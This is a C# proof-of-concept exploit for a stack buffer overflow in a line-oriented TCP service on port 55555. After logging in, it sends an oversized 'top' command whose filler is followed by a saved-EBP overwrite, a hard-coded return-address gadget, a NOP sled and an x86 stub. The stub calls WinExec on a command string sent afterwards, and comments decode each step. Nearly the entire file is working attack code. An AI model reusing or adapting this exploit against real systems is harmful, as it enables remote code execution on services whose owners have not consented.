using System;
using System.Collections.Generic;
using System.Globalization;
using System.Net;
using System.Net.Sockets;
using System.Numerics; // was "System.Numeric", which is not a namespace and does not compile
namespace Exploit {
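class Program {
    // Proof-of-concept stack overflow against a line-oriented service on
    // loopback TCP port 55555.  The "top" command is the overflow vector:
    // after the digit filler, the bytes that follow overwrite the saved
    // EBP, then the saved return address, and then supply a NOP sled plus
    // a short x86 stub that calls WinExec on the command string sent last.
    //
    // Every address below is a fixed, build-specific Windows address taken
    // from the author's machine (no ASLR).  On any other build the target
    // will simply crash; the addresses have to be re-derived first.

    // Overwrites the saved frame pointer (original comment: "prepis EBP").
    // The value is arbitrary; it is never dereferenced before the return.
    static readonly byte[] SavedEbp = { 0x01, 0x01, 0x01, 0x01 };

    // Overwrites the saved return address with 0x77FA03F8, little-endian
    // (original comment: "prepis EIP").  Presumably a jmp/call-esp style
    // gadget in a system DLL, since execution has to continue in the NOP
    // sled that sits right after it on the stack -- TODO confirm on target.
    static readonly byte[] ReturnAddress = { 0xF8, 0x03, 0xFA, 0x77 };

    // Twelve NOPs so the gadget may land a little imprecisely.
    static readonly byte[] NopSled = {
        0x90, 0x90, 0x90, 0x90,
        0x90, 0x90, 0x90, 0x90,
        0x90, 0x90, 0x90, 0x90
    };

    // x86 stub, decoded:
    //   B8 09 FA 12 10   mov eax, 0x1012FA09
    //   B9 FF FF FF 80   mov ecx, 0x80FFFFFF
    //   23 C1            and eax, ecx        ; eax = 0x0012FA09, built this way so the
    //                                        ; payload itself contains no NUL byte
    //   BD FF 54 F7 77   mov ebp, 0x77F754FF ; original comment: address of kernel32.WinExec
    //   BE 7B 82 F2 77   mov esi, 0x77F2827B ; original comment: a "call ebp" inside kernel32
    //   50               push eax            ; eax presumably points at the command string
    //                                        ; sent below, once it sits on the target's stack
    //   FF E6            jmp esi             ; -> call ebp -> WinExec(eax, <stack garbage>)
    // The command string is not NUL-terminated by us; the target is presumably
    // terminating the line after stripping CRLF -- TODO confirm.
    static readonly byte[] Stub = {
        0xB8, 0x09, 0xFA, 0x12, 0x10,
        0xB9, 0xFF, 0xFF, 0xFF, 0x80,
        0x23, 0xC1,
        0xBD, 0xFF, 0x54, 0xF7, 0x77,
        0xBE, 0x7B, 0x82, 0xF2, 0x77,
        0x50, 0xFF, 0xE6
    };

    // Entry point.  Optional args: [0] target host (default 127.0.0.1),
    // [1] target port (default 55555).  The byte stream on the wire is the
    // same as the original fragmented version; only the send granularity
    // changed (the overflow bytes now go out in one Send).
    static void Main(string[] args) {
        string host = args.Length > 0 ? args[0] : "127.0.0.1";
        int port = args.Length > 1 ? int.Parse(args[1], CultureInfo.InvariantCulture) : 55555;
        IPEndPoint ipep = new IPEndPoint(IPAddress.Parse(host), port);
        System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();

        string login = "user apiuser\r\n";
        string passwd = "passwd\r\n";
        // The digit run is the filler: its length is what makes the bytes
        // that follow land on the saved EBP of the vulnerable frame.
        string top = "top 1 123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234";
        string end = "\r\n";
        string load = "C:\\Program Files\\Bethesda Softworks\\Fallout 3\\FalloutLauncher";

        // using: the socket is released even if Connect/Send throws (the
        // original only closed it on the happy path).
        using (Socket server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)) {
            server.Connect(ipep);

            // Replies are never read; the target is assumed to accept the
            // whole dialogue without being waited on -- TODO confirm.
            server.Send(StrToByteArray(login));
            server.Send(StrToByteArray(passwd));
            server.Send(StrToByteArray(top));
            Console.WriteLine();

            server.Send(BuildOverflow());

            byte[] arrayS = StrToByteArray(load);
            server.Send(arrayS);
            Console.Write("Sended: " + encoding.GetString(arrayS));
            arrayS = StrToByteArray(end);
            server.Send(arrayS);
            Console.Write("Sended: " + encoding.GetString(arrayS));
        }
    }

    // Concatenates the post-filler payload in stack order:
    // saved EBP, return address, NOP sled, stub.
    private static byte[] BuildOverflow() {
        List<byte> payload = new List<byte>(SavedEbp.Length + ReturnAddress.Length + NopSled.Length + Stub.Length);
        payload.AddRange(SavedEbp);
        payload.AddRange(ReturnAddress);
        payload.AddRange(NopSled);
        payload.AddRange(Stub);
        return payload.ToArray();
    }

    // Encodes str as ASCII.  Any non-ASCII character would be replaced by
    // '?' -- fine here, every payload string is plain ASCII.
    // Throws ArgumentNullException for a null str.
    public static byte[] StrToByteArray(string str) {
        return System.Text.Encoding.ASCII.GetBytes(str);
    }

    // Parses a byte written as a "0x"-prefixed hex literal ("0xF8" -> 0xF8).
    // Accepts upper- or lower-case digits, one or two of them; anything else
    // throws FormatException (ArgumentNullException for null).
    // The hand-rolled parser it replaces only understood upper-case A-F and
    // silently mis-read inputs with more than two digits ("0x123" -> 39).
    public static byte StringToByte(String hex) {
        if (hex == null) {
            throw new ArgumentNullException("hex");
        }
        bool hasPrefix = hex.Length >= 2 && hex[0] == '0' && (hex[1] == 'x' || hex[1] == 'X');
        if (!hasPrefix) {
            throw new FormatException("expected a 0x-prefixed hex byte, got \"" + hex + "\"");
        }
        string digits = hex.Substring(2);
        if (digits.Length < 1 || digits.Length > 2) {
            throw new FormatException("expected one or two hex digits after 0x, got \"" + hex + "\"");
        }
        // AllowHexSpecifier: digits only, no sign, no whitespace.
        return byte.Parse(digits, NumberStyles.AllowHexSpecifier, CultureInfo.InvariantCulture);
    }
}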
}